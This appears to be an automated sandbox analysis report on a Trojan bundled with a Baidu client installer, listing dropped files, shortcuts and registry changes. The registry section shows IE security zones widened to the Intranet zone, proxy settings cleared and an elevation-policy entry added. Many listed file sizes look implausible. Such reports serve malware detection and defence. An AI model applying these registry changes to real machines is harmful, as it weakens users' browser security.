%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-checked.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-newtab.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\1.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxinNotify.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\general.png (379 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-taobao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\input.png (214 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUINotify.xml (412 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\unknown.png (480 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\vedio_play.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.eot (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-right.png (202 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\arrow-png8.png (260 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Utils.dll (46592 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-png8.png (292 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks.css (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general.png (866 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-checked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\reset.css (826 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dust.png (812 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserCore.dll (67072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\ie-fix.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxinNotify.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\ice-rain.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\bookmarks_mods.js (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu.png (367 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\arrow.png (203 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sf.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading.png (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\executor.xml (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sc_tmp.dll.bdtmp (18424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Report.dll (7232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\365.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-snow.png (992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\icon-tree-search-ie8.png (15 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CommonWorker.dll (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\343.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\unknown.png (851 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading-large.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\368.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages.css (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sleet.png (436 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog-close.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserFrame.dll (67494 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo25x29.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\qxdh20140619.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AppContainer.rdb (10 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Report.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\duststorm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-new.png (977 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower-with-hail.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\skinres.rdb (23424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\app-reload.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\LocalPluginInfo.xml (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\DetectVm.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-flurry.png (847 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-hover-png8.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\AppHTMLReSou.xml (438 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Protocol.dll (12024 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\icon_weixin.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\storm.png (815 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDMSkin.dll (60928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mb_setup.log (2575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\BDMSkin.dll (30464 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Download.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\music_play.png (960 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe (11040 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\GlobalPluginInfo.xml (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-fail.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery.color-2.1.2.min.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\AppHTMLGuPiao.xml (440 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\new.png (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxin.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianDll.dll (16 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BrowserNotify.rdb (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\bdb_scheme.dat (1484 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-refresh.png (215 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\executor.xml (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\res\InstallWnd.zip (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.svg (4992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\AppHTMLXiaoXi.xml (440 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-tooltip-png8.png (329 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower.png (898 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\CommonRes.rdb (74736 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\duststorm.png (811 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db (20 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_g.png (968 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\atl100.dll (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\347.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\dataReport.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerProxy.dll (10128 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\icon_resou.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\head-star-png8.png (450 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDClientProxy.dll (45104 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\overcast.png (680 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ala.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.ttf (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sunny.png (856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-foward.png (156 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-snow.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings_z.png (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-center.png (122 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\res_gupiao.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_g.png (248 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Heartbeat.dll (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\ssl-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-login-success.png (824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-back.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\kuaidi.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sand.png (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp (0 bytes)
The process Baidu.exe:808 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\settings\user_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (512 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130895171752697500.dat (314 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\stock.pb (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerExe.exe (63735 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db (284596 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db.bak (10 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (5454 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\novel.pb (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\settings\default_setting.db (24 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db (145 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\blank_tab\new_tab.db-journal (0 bytes)
%Documents and Settings%\All Users\Baidu\BDCLProxy\10000302_130895171752697500.dat (0 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\auto_complete\auto_complete.db-journal (0 bytes)
The process Baidu.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Desktop\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\卸载百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\百度.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\百度\百度.lnk (1 bytes)
The process YouQian_Setup.exe:1488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
Registry activity
The process %original file name%.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 8F 1D B3 33 71 2A 29 F8 42 02 F5 12 48 40 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings to map all local web nodes whose names contain no dots and which do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 4A 86 52 67 75 0D F3 B0 95 A1 D3 7C BF 36 EB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Baidu\BaiduYouQian\packageinstall]
"param" = "Xxjh9G0tXMLez7O2T5upZbVkEFeGSirxy9dYQekwVzz3Z1ikJ jGDPSC0WRykW8aBmNrUQLi0OivztreQTX3edZTHioyulIhwOqiMyhdNK5MIUOU gYtMOfnR5maiaU9pCLak4mk2g7IGTEYLRGOkoo0QxbHsGj8Iv7jDuuJCgpSTL4Y2DQ0HuRIvWnwySHLybfpSRZkg29W8v/4oj0Bw2BJW6DWTg9VdBGmSEvZ1Ts8wvoZ41Dg nELDVclUFp2ihqcJPWYwTXJCCUc98tEqHuPf1CmzlAFFQaavUCwz/Geq45ALZiGAvlfHXZEJ5fQ50uD7lzwPCim6hqqGPp ra6HcmESFC6V1MGyIxU4kJzPtnT2xv67aOTXPT8nGfpbFBbAHxoLdmNabYU fdZPJ c U3HbzBeoO/qJaLe5hDaCjLD0a9EnDBDJ1izfKUw/Wxw0t3hDna1QSle7Y9kQ6bW GTxGl/lceIohXMputK67QsdQZRh QJ6EkgMFnwwh"
The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"Policy" = "3"
[HKLM\SOFTWARE\Baidu\Baidu]
"TN" = "SE_Baiduclient_9vpgkwv8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "百度主程序"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"AppPath" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359"
